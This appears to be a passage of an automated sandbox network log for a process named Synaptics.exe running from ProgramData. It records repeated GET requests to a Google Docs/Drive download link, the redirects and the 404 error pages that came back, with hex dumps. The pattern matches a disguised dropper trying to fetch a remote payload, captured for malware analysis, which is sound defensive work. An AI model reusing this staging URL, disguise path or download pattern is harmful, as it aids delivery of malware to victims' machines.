                                                                                              2025-01-02 19:28:52 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              21192.168.2.749805216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:52 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:53 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:52 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-vvww7tLWzgUHvprCmb6Ung' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              22192.168.2.749806216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:52 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:53 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:53 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ib15c5zE44CTJj4vs1qodg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              23192.168.2.749807142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:52 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:53 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7Y5qfRvFEVEpDNqVkEEalEaJfHBWgLocvi1Hw0eMljV8sa-woEE2gUwDsaic2Na0x-017kXPE
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:53 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-dIssyTTKf0R26Wf_M4lPAA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:53 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:28:53 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 4e 5f 31 64 52 69 47 78 30 47 37 41 59 49 78 45 32 68 58 41 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="0N_1dRiGx0G7AYIxE2hXAg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:28:53 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              24192.168.2.749812142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:53 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:53 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7fihzvprkEarBUOjHrPty6BHh1u4p0RZkqzW6MubeEwPcelLlk5O14SNZteJuJaEwou26As8k
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:53 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tU6HTSZdCDon1rz2ihppvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:53 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:28:53 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 6f 51 6e 78 34 67 48 59 65 4d 64 38 4e 4c 30 67 64 69 56 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="xoQnx4gHYeMd8NL0gdiViQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:28:53 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              25192.168.2.749815216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:53 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              26192.168.2.749816216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:53 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              27192.168.2.749821142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:53 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              28192.168.2.749831216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:54 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:55 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:54 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-bnkYFK9oHRkljUcfNKK7Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              29192.168.2.749832216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:54 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:55 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:54 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-C6fIL1YWQurh9J3sHYVGNg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              30192.168.2.749840216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:55 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:56 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:56 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-MIYKy7qFnPttSA9sRnPX3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              31192.168.2.749839142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:56 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5GrKxLaq86KQt_GLnYGt8Si4wgr5nMSiK0NgJJBz2hJum9st7AcNCqbKoXi5OafKM4
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:56 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-tMz8q7_vdm_InKxcQ9v8sQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:56 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
